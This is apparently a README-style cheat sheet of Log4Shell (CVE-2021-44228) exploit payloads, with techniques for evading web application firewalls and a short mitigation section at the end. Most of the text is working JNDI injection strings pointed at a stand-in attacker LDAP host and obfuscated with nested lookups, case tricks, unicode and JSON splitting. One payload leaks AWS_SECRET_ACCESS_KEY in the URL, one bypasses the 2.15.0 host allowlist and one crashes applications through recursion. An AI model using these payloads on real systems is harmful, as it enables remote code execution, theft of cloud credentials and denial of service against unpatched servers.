🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
CVE-2021-44228 works on:
log4j: 2.0 <= Apache log4j <= 2.14.1
Java version already patched: 6u211+, 7u201+, 8u191+, 11.0.1+.
Windows Defender started to remove .java files that include jndi:ldap:....
Simple attacker script (Possible RCE):
${jndi:ldap://somesitehackerofhell.com/z}
WAF or developers started to block phrases:
to secure applications.
However, the attacker can bypass it by using one of these techniques:
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
From Apache Log4j 2 documentation: ${env:ENV_NAME:-default_value}
If there is no ENV_NAME system environment variable, use text after :-
The attacker can use any name instead of ENV_NAME, but it has to no exists.
Or the hacker can read environment variable, example for AWS_SECRET_ACCESS_KEY:
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
Check out more secrets in 🦄🔒 Awesome list of secrets in environment variables 🖥️
You can check your system environment variables:
dir env:
printenv
or env
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}
Lower Lookup The LowerLookup converts the passed in argument to lower case. Presumably the value will be the result of a nested lookup.
${lower:<text>}
Upper Lookup The UpperLookup converts the passed in argument to upper case. Presumably the value will be the result of a nested lookup.
${upper:<text>}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
${jnd${upper:ı}:ldap://somesitehackerofhell.com/z}
ı get converted to i
${jnd${sys:SYS_NAME:-i}:ldap:/somesitehackerofhell.com/z}
If there is no SYS_NAME system property, use text after :-
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://somesitehackerofhell.com/z}
Java date formatting converts YYYY to 2021, but it converts 'YYYY' to YYYY or 'j' to j.
Replace characters with:
You can read more here HTML URL Encoding Reference
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://somesitehackerofhell.com/z}
It does not verify the existence of lookup and just evaluates to default happily.
{
"one-${jnd${a":"a:-i}:ld${",
"two":"o:-a}p://somesitehackerofhell.com/z}
}
"Separately these keys and values do not represent an attack. But all them together is an attack and this attack is transparent to the detection systems because of the JSON parser." Read more...
${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}
Convert some characters to unicode.
${jndi:ldap://127.0.0.1#somesitehackerofhell.com/z}
Bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. The java.net.URI getHost() method returns the value before the # as the real host. But the JNDI/LDAP resolver will resolve to the full hostname string attempting to connect to the malicious LDAP server.
${${::-${::-$${::-j}}}}
If a string substitution is attempted for any reason on the following string, it will trigger an infinite recursion, and the application will crash.
Craft special pdf file to exploit CVE-2021-44228
Get a pdf file and read more...
To test entry you can use:
tl;dr Update to log4j-2.17.1
or later.
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.
I am not an author of CVE-2021-44228 and some bypasses